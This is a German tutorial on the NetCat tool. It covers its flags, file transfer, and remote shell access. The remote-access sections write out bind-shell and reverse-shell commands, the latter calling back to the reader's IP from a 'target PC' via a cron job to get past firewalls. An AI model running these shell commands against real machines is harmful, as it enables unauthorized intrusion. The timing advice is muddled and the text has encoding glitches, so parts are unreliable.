1 NetCat - Das Schweizer Taschenmesser f?r TCP/IP|Artikel|Projekt OsUp

NetCat - Das Schweizer Taschenmesser f?r TCP/IP

Da NetCat keinerlei Verschl?sselung o.?. unterst?tzt, solltet ihr sehr vorsichtig damit umgehen. Da NetCat keinerlei Verschlüsselung o.ä. unterstützt, solltet ihr sehr vorsichtig damit umgehen.
NetCat ist im Prinzip ein sehr primitives Konsolen-Programm, dass Daten sendet und empfängt.

Zuerst einmal die Parameter, die ihr verwenden könnt:
-v (~verbose) NetCat zeigt euch Information darüber an, was gerade läuft (z.B. wenn jemand connectet usw.)
-vv (~ very verbose) NetCat zeig euch so viele Information wie möglich an.
-e (~ execute) Das nachfolgende Programm wird ausgeführt (z.B. -e cmd.exe o. -e /bin/sh)
-d (~ distach form console) NetCat wird versetckt gestartet
-l (~ listen) NetCat "lauscht"
-L das selbe wie -l, nur dass NetCat weitehin "lauscht", wenn die die Verbindung getrannt wird.
-p (~ port) die nachfolgende Nummer bezeichnet den Port
-t (~ telnet) alle Telnet-Verbindungen werden verarbeitet
-u UDP Modus
-o (~ output) alle empfangenen bzw. gesendeten Daten werden in der nachfolgenden Datei gespeichert. (auch als Hex-Dump)

So. Nachdem ihr die wichtigen Parameter alle kennt, kommen wir zur Praxis.

1) Dateien übertragen
Um eine Datei zu senden, gebt ihr das ein:
nc -l -p 1234 < dateiname
Erklärung:
mit -l macht ihr NetCat klar, dass es als "Server" handeln soll (=nirgendwohin connecten)
mit -p 1234 stellt ihr den Port (1234) ein.
mit < dateiname "jagt" ihr alle Bytes von der Datei "dateiname" ins Netz (= zu dem Computer, der connectet)

Jezt wollt ihr diese Datei dann bestimmt auch empfangen.
Dazu gebt ihr das ein:
nc -v [ip-adresse vom rechner, der die datei sendet] 1234 > dateiname
Erklärung:
Mit -v gibt euch NetCat Informationen, was grad läuft (am besten immer -v als Parameter übergeben!)
mit "[ip-adresse vom rechner, der die datei sendet] 1234" connectet NetCat zur Ip-Adresse auf Port 1234.
Mit > dateiname speichert NetCat alles, was empfangen wird in die Datei "dateiname".

2) NetCat zum Remote-Zurgriff verwenden
2.1) Einfach (ohne Firewall)
Auf dem Rechner, auf den ihr übers Netz zugreifen wollt gebt ihr das ein:
nc -l -p 1234 -e cmd.exe -t
(unter Linux müsst ihr natürlich das cmd.exe in /bin/sh umwandeln)
erklärung:
mit -e cmd.exe führt NetCat cmd.exe aus und sendet alles an die aktive Verbindung.
Wenn der Verbundene PC was sendet, überträgt NetCat das automatisch an cmd.exe.
Wenn ihr jetzt logisch denkt, wisst ihr, was man dann alles machen kann.(ALLES *g*)
Mit -t erlaubt ihr Telnet-Sessions.

Auf der Client-Seite gebt ihr das ein:
nc [ip-adresse den ziel-rechners] 1234
oder
telnet [ip-adresse den ziel-rechners] 1234
Was das amcht muss ich nciht erklären (ist slebst erklärend!)

2.2) Lösung für PCs hinter Firewalls (Reverse Telnet)
Das bei 2.1 klappt wunderbar bei Rechnern, die nicht hinter einer Firewall sind.
Aber wenn ihr auf einen Rechner hinter einer Firewall zugreifen wollt, gibt's Probleme, da eine Firewall ja bekannt lich keine Verbindungen von "aussen" zulässt, sondern nur welche, die von "innen" kommen.
Es wäre also praktisch, wenn der Ziel-PC eine Verbindung aufbauen würde (das kann man unter Linux z.B. mit Cronjobs lösen).
Aber wir wollen ja nicht, dass der Ziel-PC zugriff auf unseren PC hat, sondern das Gegenteil.
Deshalb muss der Rechner das machen:
nc [eure IP] 1234 -e cmd.exe
Zur erklärung (eigentlich wisst ihr ja schon alles):
das -e cmd.exe macht hier genau das gegenteil von vorher.

Bei euch muss aber BEVOR (!) der Zeil-PC connecten will das laufen:
nc -l -p 1234

Und wenn ihr jetzt also nen Cronjob um 22:00 auf dem Ziel-PC laufen habt, müsst ihr spätestens um 19:59 bei euch NetCat anwerfen.

So. Das war's. Ich hoffe, das Tutorial hat euch weitergeholfen.
Noch ein Hinweis:
Wenn ihr auf nem PC eingeloggt seid (über Netcat, sowie poben beschrieben), und ihr wollt ne Datei "hochladen", dann macht ihr das so (um die verbindung nicht zu verlieren):
ihr ruft einfach netcat über "start" auf:
Also statt
nc -v [ip-adresse vom rechner, der die datei sendet] 1234 > dateiname
einfach
start nc -v [ip-adresse vom rechner, der die datei sendet] 1234 > dateiname
Dann bleibt eure Verbindung und das neue NetCat startet als eigener Prozess.

Sie k?nnen keine Kommentare abgeben!